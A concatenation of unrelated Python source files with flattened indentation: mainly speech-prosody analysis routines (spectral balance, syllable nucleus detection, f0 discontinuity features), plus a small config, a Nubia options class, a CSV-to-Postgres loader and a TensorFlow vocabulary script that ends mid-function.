# spectral balance calculation according to Fant 2000
# IN:
# sig: signal (vowel segment)
# fs: sampe rate
# opt:
# 'win': length of central window in ms <len(sig)>; -1 is same as len(sig)
# 'ub': upper freq boundary in Hz <-1> default: no low-pass filtering
# 'domain': <'freq'>|'time'; pre-emp in frequency (Fant) or time domain
# 'alpha': <0.95> for time domain only y[n] = x[n]-alpha*x[n-1]
# if alpha>0 it is interpreted as lower freq threshold for pre-emp
# OUT:
# sb: spectral tilt
def splh_spl(sig,fs,opt_in={}):
opt = cp.deepcopy(opt_in)
opt = myl.opt_default(opt,{'win':len(sig),'f':-1,'btype':'none',
'domain':'freq','alpha':0.95})
#print(opt)
#myl.stopgo()
## cut out center window ##################################
ls = len(sig)
if opt['win'] <= 0:
opt['win'] = ls
if opt['win'] < ls:
wi = myl.windowing_idx(int(ls/2),
{'rng':[0, ls],
'win':int(opt['win']*fs)})
y = sig[wi]
else:
y = cp.deepcopy(sig)
if len(y)==0:
return np.nan
# reference sound pressure level
p_ref = pRef('spl')
## pre-emp in time domain ####################################
if opt['domain']=='time':
# low pass filtering
if opt['btype'] != 'none':
flt = fu_filt(y,{'fs':fs,'f':opt['f'],'ord':6,
'btype':opt['btype']})
y = flt['y']
yp = pre_emphasis(y,opt['alpha'],fs,False)
y_db = 20*np.log10(myl.rmsd(y)/p_ref)
yp_db = 20*np.log10(myl.rmsd(yp)/p_ref)
#print(yp_db - y_db)
return yp_db - y_db
## pre-emp in frequency domain ##############################
# according to Fant
# actual length of cut signal
n = len(y)
## hamming windowing
y *= np.hamming(n)
## spectrum
Y = np.fft.fft(y,n)
N = int(len(Y)/2)
## frequency components
XN = np.fft.fftfreq(n,d=1/fs)
X = XN[0:N]
# same as X = np.linspace(0, fs/2, N, endpoint=True)
## amplitudes
# sqrt(Y.real**2 + Y.imag**2)
# to be normalized:
# *2 since only half of transform is used
# /N since output needs to be normalized by number of samples
# (tested on sinus, cf
# http://www.cbcity.de/die-fft-mit-python-einfach-erklaert)
a = 2*np.abs(Y[:N])/N
## vowel-relevant upper frequency boundary
if opt['btype'] != 'none':
vi = fu_filt_freq(X,opt)
if len(vi)>0:
X = X[vi]
a = a[vi]
## Fant preemphasis filter (Fant et al 2000, p10f eq 20)
preemp = 10*np.log10((1+X**2/200**2)/(1+X**2/5000**2))
ap = 10*np.log10(a)+preemp
# retransform to absolute scale
ap = 10**(ap/10)
# corresponds to gain values in Fant 2000, p11
#for i in myl.idx(a):
# print(X[i],preemp[i])
#myl.stopgo()
## get sound pressure level of both spectra
# as 20*log10(P_eff/P_ref)
spl = 20*np.log10(myl.rmsd(a)/p_ref)
splh = 20*np.log10(myl.rmsd(ap)/p_ref)
## get energy level of both spectra
#spl = 20*np.log10(myl.mse(a)/p_ref)
#splh = 20*np.log10(myl.mse(ap)/p_ref)
## spectral balance
sb = splh-spl
#print(spl,splh,sb)
#myl.stopgo()
#fig = plt.figure()
#plt.plot(X,20*np.log10(a),'b')
#plt.plot(X,20*np.log10(preemp),'g')
#plt.plot(X,20*np.log10(ap),'r')
#plt.show()
return sb
# returns indices of freq in x fullfilling conditions in opt
# IN:
# X: freq array
# opt: 'btype' - 'none'|'low'|'high'|'band'|'stop'
# 'f': 1 freq for low|high, 2 freq for band|stop
# OUT:
# i: indices in X fulfilling condition
def fu_filt_freq(X,opt):
typ = opt['btype']
f = opt['f']
# all indices
if typ=='none':
return myl.idx_a(len(X))
# error handling
if re.search('(band|stop)',typ) and (not myl.listType(f)):
print('filter type requires frequency list. Done nothing.')
return myl.idx_a(len(X))
if re.search('(low|high)',typ) and myl.listType(f):
print('filter type requires only 1 frequency value. Done nothing.')
return myl.idx_a(len(X))
if typ=='low':
return np.nonzero(X<=f)
elif typ=='high':
return np.nonzero(X>=f)
elif typ == 'band':
i = set(np.nonzero(X>=f[0]))
return np.sort(np.array(i.intersection(set(np.nonzero(X<=f[1])))))
elif typ == 'stop':
i = set(np.nonzero(X<=f[0]))
return np.sort(np.array(i.union(set(np.nonzero(X>=f[1])))))
return myl.idx_a(len(X))
# returns reverence levels for typ
# IN:
# typ
# 'spl': sound pressure level
# 'i': intensity level
# OUT:
# corresponding reference level
def pRef(typ):
if typ=='spl':
return 2*10**(-5)
return 10**(-12)
# syllable nucleus detection
# IN:
# s - mono signal
# opt['fs'] - sample frequency
# ['ons'] - onset in sec <0> (to be added to time output)
# ['flt']['f'] - filter options, boundary frequencies in Hz
# (2 values for btype 'band', else 1): <np.asarray([200,4000])>
# ['btype'] - <'band'>|'high'|'low'
# ['ord'] - butterworth order <5>
# ['fs'] - (internally copied)
# ['l'] - analysis window length
# ['l_ref'] - reference window length
# ['d_min'] - min distance between subsequent nuclei (in sec)
# ['e_min'] - min energy required for nucleus as a proportion to max energy <0.16>
# ['e_rel'] - min energy quotient analysisWindow/referenceWindow
# ['e_val'] - quotient, how sagged the energy valley between two nucleus
# candidates should be. Measured relative to the lower energy
# candidate. The lower, the deeper the required valley between
# two peaks. Meaningful range ]0, 1]. Recommended range:
# [0.9 1[
# ['center'] - boolean; subtract mean energy
# OUT:
# ncl['t'] - vector of syl ncl time stamps (in sec)
# ['ti'] - corresponding vector idx in s
# ['e_ratio'] - corresponding energy ratios (analysisWindow/referenceWindow)
# bnd['t'] - vector of syl boundary time stamps (in sec)
# ['ti'] - corresponding vector idx in s
# ['e_ratio'] - corresponding energy ratios (analysisWindow/referenceWindow)
def syl_ncl(s,opt={}):
## settings
if 'fs' not in opt:
sys.exit('syl_ncl: opt does not contain key fs.')
dflt = {'flt':{'f':np.asarray([200,4000]),'btype':'band','ord':5},
'e_rel':1.05,'l':0.08,'l_ref':0.15, 'd_min':0.12, 'e_min':0.1,
'ons':0, 'e_val': 1, 'center': False}
opt = myl.opt_default(opt,dflt)
opt['flt']['fs'] = opt['fs']
if syl_ncl_trouble(s,opt):
t = np.asarray([round(len(s)/2+opt['ons'])])
ncl = {'ti':t, 't':myl.idx2sec(t,opt['fs']), 'e_ratio':[0]}
bnd = cp.deepcopy(ncl)
return ncl, bnd
# reference window length
rws = math.floor(opt['l_ref']*opt['fs'])
# energy win length
ml = math.floor(opt['l']*opt['fs'])
# stepsize
sts = max([1,math.floor(0.03*opt['fs'])])
# minimum distance between subsequent nuclei
# (in indices)
#md = math.floor(opt['d_min']*opt['fs']/sts)
md = math.floor(opt['d_min']*opt['fs'])
# bandpass filtering
flt = fu_filt(s,opt['flt'])
y = flt['y']
# signal length
ls = len(y)
# minimum energy as proportion of maximum energy found
e_y = np.asarray([])
i_steps = np.arange(1,ls,sts)
for i in i_steps:
yi = np.arange(i,min([ls,i+ml-1]),1)
e_y = np.append(e_y,myl.rmsd(y[yi]))
if bool(opt['center']):
e_y -= np.mean(e_y)
e_min = opt['e_min']*max(e_y)
# output vector collecting nucleus sample indices
t = np.asarray([])
all_i = np.asarray([])
all_e = np.asarray([])
all_r = np.asarray([])
# energy calculation in analysis and reference windows
wopt_en = {'win':ml,'rng':[0,ls]}
wopt_ref = {'win':rws,'rng':[0,ls]}
for i in i_steps:
yi = myl.windowing_idx(i,wopt_en)
#yi = np.arange(yw[0],yw[1],1)
ys = y[yi]
e_y = myl.rmsd(ys)
#print(ys,'->',e_y)
ri = myl.windowing_idx(i,wopt_ref)
#ri = np.arange(rw[0],rw[1],1)
rs = y[ri]
e_rw = myl.rmsd(rs)
all_i = np.append(all_i,i)
all_e = np.append(all_e,e_y)
all_r = np.append(all_r,e_rw)
# local energy maxima
# (do not use min duration md for order option, since local
# maximum might be obscured already by energy increase
# towards neighboring peak further away than md, and not only by
# closer than md peaks)
idx = sis.argrelmax(all_e,order=1)
#plot_sylncl(all_e,idx) #!v
#print(opt["ons"]/opt["fs"] + np.array(idx)*sts/opt["fs"]) #!v
#myl.stopgo() #!v
### maxima related to syl ncl
## a) energy constraints
# timestamps (idx)
tx = np.asarray([])
# energy ratios
e_ratiox = np.asarray([])
# idx in all_i
tix = np.asarray([]).astype(int)
for i in idx[0]:
# valley between this and previous nucleus deep enough?
if len(tix)>0:
ie = all_e[tix[-1]:i]
if len(ie)<3:
continue
valley = np.min(ie)
nclmin = np.min([ie[0],all_e[i]])
if valley >= opt['e_val'] * nclmin:
# replace previous nucleus by current one
if all_e[i] > ie[0]: #!n
all_e[tix[-1]] = all_e[i] #!n
tx[-1] = all_i[i] #!n
tix[-1] = i #!n
e_ratiox[-1] = all_e[i]/all_r[i] #!n
#print("valley constraint -- tx:", all_i[i]/opt["fs"], "nclmin:", nclmin, "valley:", valley, "ie0:", ie[0], "all_e:", all_e[i], "--> skip!") #!v
continue
if ((all_e[i] >= all_r[i]*opt['e_rel']) and (all_e[i] > e_min)):
tx = np.append(tx,all_i[i])
tix = np.append(tix,i)
e_ratiox = np.append(e_ratiox, all_e[i]/all_r[i])
#else: #!v
# print("min_en constraint -- tx:", all_i[i]/opt["fs"], "all_e:", all_e[i], "all_r:", all_r[i], "e_min:", e_min, "--> skip!") #!v
#print(len(tx)) #!v
if len(tx)==0:
dflt = {'ti':myl.ea(),
't':myl.ea(),
'e_ratio':myl.ea()}
return dflt, dflt
#plot_sylncl(all_e,tix) #!v
## b) min duration constraints
# init by first found ncl
t = np.array([tx[0]])
e_ratio = np.array([e_ratiox[0]])
# idx in all_i
ti = np.array([tix[0]]).astype(int)
for i in range(1,len(tx)):
# ncl too close
if np.abs(tx[i]-t[-1]) < md:
# current ncl with higher energy: replace last stored one
if e_ratiox[i] > e_ratio[-1]:
t[-1] = tx[i]
ti[-1] = tix[i]
e_ratio[-1] = e_ratiox[i]
else:
t = np.append(t,tx[i])
ti = np.append(ti,tix[i])
e_ratio = np.append(e_ratio,e_ratiox[i])
#plot_sylncl(all_e,ti) #!v
### minima related to syl bnd
tb = np.asarray([])
e_ratio_b = np.asarray([])
if len(t)>1:
for i in range(len(ti)-1):
j = myl.idx_seg(ti[i],ti[i+1])
j_min = myl.find(all_e[j],'is','min')
if len(j_min)==0: j_min=[0]
# bnd idx
bj = j[0]+j_min[0]
tb = np.append(tb,all_i[bj])
e_ratio_b = np.append(e_ratio_b, all_e[bj]/all_r[bj])
# add onset
t = t+opt['ons']
tb = tb+opt['ons']
# output dict,
# incl idx to seconds
ncl = {'ti':t, 't':myl.idx2sec(t,opt['fs']), 'e_ratio':e_ratio}
bnd = {'ti':tb, 't':myl.idx2sec(tb,opt['fs']), 'e_ratio':e_ratio_b}
#print(ncl['t'], e_ratio)
return ncl, bnd
def syl_ncl_trouble(s,opt):
if len(s)/opt['fs'] < 0.1:
return True
return False
# wrapper around Butter filter
# IN:
# 1-dim vector
# opt['fs'] - sample rate
# ['f'] - scalar (high/low) or 2-element vector (band) of boundary freqs
# ['order'] - order
# ['btype'] - band|low|high; all other values: signal returned as is
# OUT:
# flt['y'] - filtered signal
# ['b'] - coefs
# ['a']
def fu_filt(y,opt):
# do nothing
if not re.search('^(high|low|band)$',opt['btype']):
return {'y': y, 'b': myl.ea(), 'a': myl.ea()}
# check f<fs/2
if (opt['btype'] == 'low' and opt['f']>=opt['fs']/2):
opt['f']=opt['fs']/2-100
elif (opt['btype'] == 'band' and opt['f'][1]>=opt['fs']/2):
opt['f'][1]=opt['fs']/2-100
fn = opt['f']/(opt['fs']/2)
b, a = sis.butter(opt['ord'], fn, btype=opt['btype'])
yf = sis.filtfilt(b,a,y)
return {'y':yf,'b':b,'a':a}
##### discontinuity measurement #######################################
# measures delta and linear fit discontinuities between
# adjacent array elements in terms of:
# - delta
# - reset of regression lines
# - root mean squared deviation between overall regression line and
# -- preceding segment's regression line
# -- following segment's regression line
# -- both, preceding and following, regression lines
# - extrapolation rmsd between following regression line
# and following regression line, extrapolated by regression
# on preceding segment
# IN:
# x: nx2 array [[time val] ...]
# OR
# nx1 array [val ...]
# for the latter indices are taken as time stamps
# ts: nx1 array [time ...] of time stamps (or indices for size(x)=nx1)
# at which to calculate discontinuity; if empty, discontinuity is
# calculated at each point in time. If size(x)=nx1 ts MUST contain
# indices
# nx2 array [[t_off t_on] ...] to additionally account for pauses
# opt: dict
# .win: <'glob'>|'loc' calculate discontinuity over entire sequence
# or within window
# .l: <3> if win==loc, length of window in sec or idx
# (splitpoint - .l : splitpoint + .l)
# .do_plot: <0> plots orig contour and linear stylization
# .plot: <{}> dict with plotting options; cf. discont_seg()
# OUT:
# d dict
# (s1: pre-bnd segment [i-l,i[,
# s2: post-bnd segment [i,i+l]
# sc: joint segment [i-l,i+l])
# dlt: delta
# res: reset
# ry1: s1, rmsd between joint vs pre-bnd fit
# ry2: s2, rmsd between joint vs post-bnd fit
# ryc: sc, rmsd between joint vs pre+post-bnd fit
# ry2e: s2: rmsd between pre-bnd fit extrapolated to s2 and post-bnd fit
# rx1: s1, rmsd between joint fit and pre-boundary x-values
# rx2: s2, rmsd between joint fit and post-boundary x-values
# rxc: sc, rmsd between joint fit and pre+post-boundary x-values
# rr1: s1, ratio rmse(joint_fit)/rmse(pre-bnd_fit)
# rr2: s2, ratio rmse(joint_fit)/rmse(post-bnd_fit)
# rrc: sc, ratio rmse(joint_fit)/rmse(pre+post-bnd_fit)
# ra1: c1-rate s1
# ra2: c1-rate s2
# dlt_ra: ra2-ra1
# s1_c3: cubic fitting coefs of s1
# s1_c2
# s1_c1
# s1_c0
# s2_c3: cubic fitting coefs of s2
# s2_c2
# s2_c1
# s2_c0
# dlt_c3: s2_c3-s1_c3
# dlt_c2: s2_c2-s1_c2
# dlt_c1: s2_c1-s1_c1
# dlt_c0: s2_c0-s1_c0
# eucl_c: euclDist(s1_c*,s2_c*)
# corr_c: corr(s1_c*,s2_c*)
# v1: variance in s1
# v2: variance in s2
# vc: variance in sc
# vr: variance ratio (mean(v1,v2))/vc
# dlt_v: v2-v1
# m1: mean in s1
# m2: mean in s2
# dlt_m: m2-m1
# p: pause length (in sec or idx depending on numcol(x);
# always 0, if t is empty or 1-dim)
# i in each list refers to discontinuity between x[i-1] and x[i]
# dimension of each list: if len(ts)==0: n-1 array (first x-element skipped)
# else: mx6; m is number of ts-elements in range of x[:,0],
# resp. in index range of x[1:-1]
## REMARKS:
# for all variables but corr_c and vr higher values indicate higher discontinuity
## variables:
# x1: original f0 contour for s1
# x2: original f0 contour for s2
# xc: original f0 contour for sc
# y1: line fitted on segment a
# y2: line fitted on segment b
# yc: line fitted on segments a+b
# yc1: yc part for x1
# yc2: yc part for x2
# ye: x1/y1-fitted line for x2
# cu1: cubic fit coefs of time-nrmd s1
# cu2: cubic fit coefs of time-nrmd s2
# yu1: polyval(cu1)
# yu2: polyval(cu2); yu1 and yu2 are cut to same length
def discont(x,ts=[],opt={}):
# time: first column or indices
if np.ndim(x)==1:
t = np.arange(0,len(x))
x = np.asarray(x)
else:
t = x[:,0]
x = x[:,1]
# tsi: index pairs in x for which to derive discont values
# [[infimum supremum]...] s1 right-aligned to infimum, s2 left-aligne to supremum
# for 1-dim ts both values are adjacent [[i-1, i]...]
# zp: zero pause True for 1-dim ts input, False for 2-dim
tsi, zp = discont_tsi(t,ts)
# opt init
opt = myl.opt_default(opt,{'win':'glob','l':3,'do_plot':False,
'plot': {}})
# output
d = discont_init()
# linear fits
# over time stamp pairs
for ii in tsi:
## delta
d['dlt'].append(x[ii[1]]-x[ii[0]])
## segments (x, y values of pre-, post, joint segments)
t1,t2,tc,x1,x2,xc,y1,y2,yc,yc1,yc2,ye,cu1,cu2,yu1,yu2 = discont_seg(t,x,ii,opt)
d = discont_feat(d,t1,t2,tc,x1,x2,xc,y1,y2,yc,yc1,yc2,ye,cu1,cu2,yu1,yu2,zp)
# to np.array
for x in d:
d[x] = np.asarray(d[x])
return d
# init discont dict
def discont_init():
return {"dlt": [],
"res": [],
"ry1": [],
"ry2": [],
"ryc": [],
"ry2e": [],
"rx1": [],
"rx2": [],
"rxc": [],
"rr1": [],
"rr2": [],
"rrc": [],
"ra1": [],
"ra2": [],
"dlt_ra": [],
"s1_c3": [],
"s1_c2": [],
"s1_c1": [],
"s1_c0": [],
"s2_c3": [],
"s2_c2": [],
"s2_c1": [],
"s2_c0": [],
"dlt_c3": [],
"dlt_c2": [],
"dlt_c1": [],
"dlt_c0": [],
"eucl_c": [],
"corr_c": [],
"eucl_y": [],
"corr_y": [],
"v1": [],
"v2": [],
"vc": [],
"vr": [],
"dlt_v": [],
"m1": [],
"m2": [],
"dlt_m": [],
"p": []}
# pre/post-boundary and joint segments
def discont_seg(t,x,ii,opt):
# preceding, following segment indices
i1, i2 = discont_idx(t,ii,opt)
#print(ii,"\n-> ", i1,"\n-> ", i2) #!v
#myl.stopgo() #!v
t1, t2, x1, x2 = t[i1], t[i2], x[i1], x[i2]
tc = np.concatenate((t1,t2))
xc = np.concatenate((x1,x2))
# normalized time (only needed for reported polycoefs, not
# for output lines
tn1 = myl.nrm_vec(t1,{'mtd': 'minmax',
'rng': [-1, 1]})
tn2 = myl.nrm_vec(t2,{'mtd': 'minmax',
'rng': [-1, 1]})
# linear fit coefs
c1 = myPolyfit(t1,x1,1)
c2 = myPolyfit(t2,x2,1)
cc = myPolyfit(tc,xc,1)
# cubic fit coefs (for later shape comparison)
cu1 = myPolyfit(tn1,x1,3)
cu2 = myPolyfit(tn2,x2,3)
yu1 = np.polyval(cu1,tn1)
yu2 = np.polyval(cu2,tn2)
# cut to same length (from boundary)
ld = len(yu1)-len(yu2)
if ld>0:
yu1=yu1[ld:len(yu1)]
elif ld<0:
yu2=yu2[0:ld]
# robust treatment
while len(yu2)<len(yu1):
yu2 = np.append(yu2,yu2[-1])
while len(yu1)<len(yu2):
yu1 = np.append(yu1,yu1[-1])
# fit values
y1 = np.polyval(c1,t1)
y2 = np.polyval(c2,t2)
yc = np.polyval(cc,tc)
# distrib yc over t1 and t2
yc1, yc2 = yc[0:len(y1)], yc[len(y1):len(yc)]
# linear extrapolation
ye = np.polyval(c1,t2)
# legend_loc: 'upper left'
## plotting linear fits
# segment boundary
xb = []
xb.extend(yu1)
xb.extend(yu2)
xb.extend(ye)
xb.extend(x1)
xb.extend(x2)
xb = np.asarray(xb)
if opt['do_plot'] and len(xb)>0:
lw1, lw2 = 5,3
yb = [np.min(xb), np.max(xb)]
tb = [t1[-1], t1[-1]]
po = opt["plot"]
po = myl.opt_default(po,{"legend_loc": "best",
"fs_legend": 35,
"fs": (20,12),
"fs_title": 40,
"fs_ylab": 30,
"fs_xlab": 30,
"title": "",
"xlab": "time",
"ylab": ""})
po["ls"] = {"o": "--k", "b": "-k", "s1": "-g", "s2": "-g",
"sc": "-r", "se": "-c"}
po["lw"] = {"o": lw2, "b": lw2, "s1": lw1, "s2": lw1, "sc": lw1, "se": lw2}
po["legend_order"] = ["o", "b", "s1", "s2", "sc", "se"]
po["legend_lab"] = {"o": "orig", "b": "bnd", "s1": "fit s1", "s2": "fit s2",
"sc": "fit joint", "se": "pred s2"}
myl.myPlot({"o": tc, "b": tb, "s1": t1, "s2": t2, "sc": tc, "se": t2},
{"o": xc, "b": yb, "s1": y1, "s2": y2, "sc": yc, "se": ye},
po)
return t1,t2,tc,x1,x2,xc,y1,y2,yc,yc1,yc2,ye,cu1,cu2,yu1,yu2
## features
def discont_feat(d,t1,t2,tc,x1,x2,xc,y1,y2,yc,yc1,yc2,ye,cu1,cu2,yu1,yu2,zp):
## reset
d["res"].append(y2[0]-y1[-1])
## y-RMSD between regression lines: 1-pre, 2-post, c-all
d["ry1"].append(myl.rmsd(yc1,y1))
d["ry2"].append(myl.rmsd(yc2,y2))
d["ryc"].append(myl.rmsd(yc,np.concatenate((y1,y2))))
## extrapolation y-RMSD
d["ry2e"].append(myl.rmsd(y2,ye))
## xy-RMSD between regression lines and input values: 1-pre, 2-post, c-all
rx1 = myl.rmsd(yc1,x1)
rx2 = myl.rmsd(yc2,x2)
rxc = myl.rmsd(yc,xc)
d["rx1"].append(rx1)
d["rx2"].append(rx2)
d["rxc"].append(rxc)
## xy-RMSD ratios of joint fit divided by single fits RMSD
# (the higher, the more discontinuity)
d["rr1"].append(myl.robust_div(rx1,myl.rmsd(y1,x1)))
d["rr2"].append(myl.robust_div(rx2,myl.rmsd(y2,x2)))
d["rrc"].append(myl.robust_div(rxc,myl.rmsd(np.concatenate((y1,y2)),xc)))
## rates
d["ra1"].append(drate(t1,y1))
d["ra2"].append(drate(t2,y2))
d["dlt_ra"].append(d["ra2"][-1]-d["ra1"][-1])
## means
d["m1"].append(np.mean(x1))
d["m2"].append(np.mean(x2))
d["dlt_m"].append(d["m2"][-1]-d["m1"][-1])
## variances
d["v1"].append(np.var(x1))
d["v2"].append(np.var(x2))
d["vc"].append(np.var(xc))
d["vr"].append(np.mean([d["v1"][-1],d["v2"][-1]])/d["vc"][-1])
d["dlt_v"].append(d["v2"][-1]-d["v1"][-1])
## shapes
d["s1_c3"].append(cu1[0])
d["s1_c2"].append(cu1[1])
d["s1_c1"].append(cu1[2])
d["s1_c0"].append(cu1[3])
d["s2_c3"].append(cu2[0])
d["s2_c2"].append(cu2[1])
d["s2_c1"].append(cu2[2])
d["s2_c0"].append(cu2[3])
d["eucl_c"].append(myl.dist_eucl(cu1,cu2))
rr = np.corrcoef(cu1,cu2)
d["corr_c"].append(rr[0,1])
d["dlt_c3"].append(d["s2_c3"][-1]-d["s1_c3"][-1])
d["dlt_c2"].append(d["s2_c2"][-1]-d["s1_c2"][-1])
d["dlt_c1"].append(d["s2_c1"][-1]-d["s1_c1"][-1])
d["dlt_c0"].append(d["s2_c0"][-1]-d["s1_c0"][-1])
d["eucl_y"].append(myl.dist_eucl(yu1,yu2))
rry = np.corrcoef(yu1,yu2)
d["corr_y"].append(rry[0,1])
## pause
if zp:
d["p"].append(0)
else:
d["p"].append(t2[0]-t1[-1])
return d
# returns declination rate of y over time t
# IN:
# t: time vector
# y: vector of same length
# OUT:
# r: change in y over time t
def drate(t,y):
if len(t)==0 or len(y)==0:
return np.nan
return (y[-1]-y[0])/(t[-1]/t[0])
# indices in t for which to derive discont values
# IN:
# t: all time stamps/indices
# ts: selected time stamps/indices, can be empty, 1-dim or 2-dim
# OUT:
# ii
# ==t-index pairs [[i-1, i]...] for i>=1, if ts empty
# ==index of [[infimum supremum]...] t-elements for ts stamps or intervals, else
# zp
# zero pause; True for 1-dim ts, False for 2-dim
def discont_tsi(t,ts):
ii = []
# return all index pairs [i-1, i]
if len(ts)==0:
for i in np.arange(1,len(t)):
ii = myl.push(ii,[i-1,i])
return ii
# zero pause
if myl.of_list_type(ts[0]):
zp = False
else:
zp = True
# return selected index pairs
for x in ts:
# supremum and infimum
if myl.of_list_type(x):
xi, xs = x[0], x[1]
else:
xi, xs = x, x
if xi==xs:
op = '<'
else:
op = '<='
sup = myl.find(t,'>=',xs)
inf = myl.find(t,op,xi)
if len(sup)==0 or len(inf)==0 or sup[0]==0 or inf[-1]==0:
continue
ii.append([inf[-1],sup[0]])
return ii, zp
# preceding, following segment indices around t[i]
# defined by opt[win|l]
# IN:
# t: 1- or 2-dim time array [timeStamp ...] or [[t_off t_on] ...], the latter
# accounting for pauses
# ii: current idx pair in t
# opt: cf discont
# OUT:
# i1, i2: pre/post boundary index arrays
# REMARK:
# i is part of i2
def discont_idx(t,ii,opt):
lx = len(t)
i, j = ii[0], ii[1]
# glob: preceding, following segment from start/till end
if opt['win']=='glob':
return np.arange(0,ii[0]), np.arange(ii[1],lx)
i1 = myl.find_interval(t,[t[i]-opt['l'], t[i]])
i2 = myl.find_interval(t,[t[j], t[j]+opt['l']])
return i1, i2
#### discontinuity analysis: some bugs, use discont() instead
# measures delta and linear fit discontinuities between
# adjacent array elements in terms of:
# - delta
# - reset of regression lines
# - root mean squared deviation between overall regression line and
# -- preceding segment's regression line
# -- following segment's regression line
# IN:
# x: nx2 array [[time val] ...]
# OR
# nx1 array [val ...]
# for the latter indices are taken as time stamps
# OUT:
# d: (n-1)x6 array [[residuum delta reset rms_total rms_pre rms_post] ...]
# d[i,] refers to discontinuity between x[i-1,] and x[i,]
# Example:
# >> import numpy as np
# >> import discont as ds
# >> x = np.random.rand(20)
# >> d = ds.discont(x)
def discont_deprec(x):
do_plot=False
# time: first column or indices
lx = len(x)
if np.ndim(x)==1:
t = np.arange(0,lx)
x = np.asarray(x)
else:
t = x[:,0]
x = x[:,1]
# output
d = np.asarray([])
# overall linear regression
c = myPolyfit(t,x,1)
y = np.polyval(c,t)
if do_plot:
fig = plot_newfig()
plt.plot(t,x,":b",t,y,"-r")
plt.show()
# residuums
resid = x-y
# deltas
ds = np.diff(x)
# linear fits
for i in np.arange(1,lx):
# preceding, following segment
i1, i2 = np.arange(0,i), np.arange(i,lx)
t1, t2, x1, x2 = t[i1], t[i2], x[i1], x[i2]
# linear fit coefs
c1 = myPolyfit(t1,x1,1)
c2 = myPolyfit(t2,x2,1)
# fit values
y1 = np.polyval(c1,t1)
y2 = np.polyval(c2,t2)
# reset
res = y2[0] - y1[-1]
# RMSD: pre, post, all
r1 = myl.rmsd(y[i1],y1)
r2 = myl.rmsd(y[i2],y2)
r12 = myl.rmsd(y,np.concatenate((y1,y2)))
# append to output
d = myl.push(d,[resid[i],ds[i-1],res,r1,r2,r12])
return d
# robust wrapper around polyfit to
# capture too short inputs
# IN:
# x
# y
# o: order <1>
# OUT:
# c: coefs
def myPolyfit(x,y,o=1):
if len(x)==0:
return np.zeros(o+1)
if len(x)<=o:
return myl.push(np.zeros(o),np.mean(y))
return np.polyfit(x,y,o)
# plot extracted yllable nuclei (can be plotted before pruning, too)
# IN:
# y: energy contour
# idx: ncl indices (in y)
def plot_sylncl(y,idx):
x_dict = {"y": myl.idx(y)}
y_dict = {"y": y}
r = [0,0.15]
opt = {"ls": {"y": "-k"}}
# over locmax idxs
for i in myl.idx(idx):
z = "s{}".format(i)
x_dict[z] = [idx[i], idx[i]]
y_dict[z] = r
opt["ls"][z] = "-b"
myl.myPlot(x_dict,y_dict,opt)
# init new figure with onclick->next, keypress->exit
# OUT:
# figureHandle
def plot_newfig():
fig = plt.figure()
cid1 = fig.canvas.mpl_connect('button_press_event', onclick_next)
cid2 = fig.canvas.mpl_connect('key_press_event', onclick_exit)
return fig
# klick on plot -> next one
def onclick_next(event):
plt.close()
# press key -> exit
def onclick_exit(event):
sys.exit()
|
TIME_REGION = [350, 1035, 140, 40] # left, top, width, height
FPS_REGION = [2100, 950, 400, 150] # left, top, width, height
SIMULATION_SPEED = 1.4 # Slower = .6, Slow = .8, Normal = 1, Fast = 1.2, Faster = 1.4
THREADS = 6 # Use as many CPU threads as you have
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
#
from dataclasses import dataclass
@dataclass
class Options:
"""Class for defining Nubia options and settings"""
# File-based history is enabled by default. If this is set to false, we
# fallback to the in-memory history.
persistent_history: bool = True
|
from src.csv_parser import CSVParser
import logging
from src.config import cfg
import src.logger
from itertools import islice
from src.db import Database
import os
import json
from typing import List
from psycopg2.extras import execute_values
import psycopg2
def insert_to_db(rows):
cursor = Database.database_connection.cursor()
tupled_rows = generate_tuple(rows)
insert_sql= """
INSERT INTO covid_data_schema.raw_data
(
data
)
values %s
"""
execute_values(cursor, insert_sql, tupled_rows, page_size=10000,)
pass
def generate_tuple(rows):
# NOTE: Format data into list of tuples for insert query
query_tpl = []
for i in range(0, len(rows)):
tpl = (json.dumps(rows[i]),)
query_tpl.append(tpl)
return query_tpl
def load_csv_data():
Database.create_db_connection()
try:
logging.info("Extracting data from data source")
src_file_path = os.path.join("src", cfg["datasource"]["filename"])
path_check = os.path.exists(src_file_path)
csv_rows = CSVParser.parse_csv_from_file(src_file_path)
batch_size = 1000
logging.info("Inserting values to database")
while(True):
rows = list(islice(csv_rows, 0, batch_size))
insert_to_db(rows)
if(len(rows) <= 0):
break
logging.info("Committing DB Actions")
Database.commit_db_actions()
logging.info("Done")
except Exception as e:
Database.rollback_db_actions()
Database.close_db_connection()
raise e
if(__name__ == "__main__"):
load_csv_data()
pass
|
import argparse
import logging
import os
import tensorflow as tf
from nlpvocab import Vocabulary
from .input import RESERVED, vocab_dataset
from .model import _unit_embedder
from .config import VectModel, build_config
def extract_vocab(data_path, config):
dataset = vocab_dataset(data_path, config)
label_vocab = Vocabulary()
for labels in dataset:
label_vocab.update(labels.flat_values.numpy())
label_vocab = Vocabulary({w.decode('utf-8'): f for w, f in label_vocab.most_common()})
assert 0 == label_vocab[''], 'Empty label occured'
embedder = _unit_embedder(config, RESERVED)
unit_vocab = embedder.vocab(label_vocab)
return unit_vocab, label_vocab
def _vocab_names(data_path, config, fmt=Vocabulary.FORMAT_BINARY_PICKLE):
model_name = config.vect_model.value
if VectModel.CBOWPOS == config.vect_model:
model_name = VectModel.CBOW.value
ext = 'pkl' if Vocabulary.FORMAT_BINARY_PICKLE == fmt else 'tsv'
unit_vocab = 'vocab_{}_{}_unit.{}'.format(model_name, config.input_unit.value, ext)
label_vocab = 'vocab_{}_{}_label.{}'.format(model_name, config.input_unit.value, ext)
return os.path.join(data_path, unit_vocab), os.path.join(data_path, label_vocab)
def main():
parser = argparse.ArgumentParser(description='Extract vocabulary from dataset')
parser.add_argument(
'hyper_params',
type=argparse.FileType('rb'),
help='YAML-encoded model hyperparameters file')
parser.add_argument(
'data_path',
type=str,
help='Path to train .txt.gz files')
argv, _ = parser.parse_known_args()
assert os.path.exists(argv.data_path) and os.path.isdir(argv.data_path), 'Wrong train dataset path'
tf.get_logger().setLevel(logging.INFO)
params_path = argv.hyper_params.name
argv.hyper_params.close()
config = build_config(params_path)
tf.get_logger().info('Estimating {} and label vocabularies'.format(config.input_unit))
unit_vocab, label_vocab = extract_vocab(argv.data_path, config)
tf.get_logger().info('Saving vocabularies to {}'.format(argv.data_path))
